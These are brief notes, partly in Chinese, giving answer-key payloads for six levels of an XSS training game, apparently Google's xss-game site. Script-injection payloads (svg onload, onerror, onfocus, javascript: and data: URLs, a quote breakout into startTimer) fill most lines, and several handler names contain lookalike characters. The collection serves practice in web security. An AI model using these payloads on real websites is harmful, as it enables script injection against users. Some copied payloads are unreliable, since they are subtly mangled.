https://xss-game.appspot.com/level1
https://xss-game.appspot.com/level1
payload: <svg οnlοad=alert(1)>
https://xss-game.appspot.com/level2
过滤掉了<script>关键词
payloads:
<svg οnlοad=alert(1)>
<input autofocus οnfοcus=alert(1)>
<video><source οnerrοr="JavaScript:alert(1)">
<marquee onstart=alert(1)>
https://xss-game.appspot.com/level3
payload1: ' οnerrοr='alert(1)' >
payload2: ' οnmοuseοver=alert(1)//
https://xss-game.appspot.com/level4
sourcecode:
<
img
src
=
"/static/loading.gif"
onload
=
"startTimer('{{ timer }}');"
/>
payload1: 5'),alert('1
payload2: 5'),alert('1')//
https://xss-game.appspot.com/level5
payload: javascript:alert(1)
https://xss-game.appspot.com/level6
payload: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('1')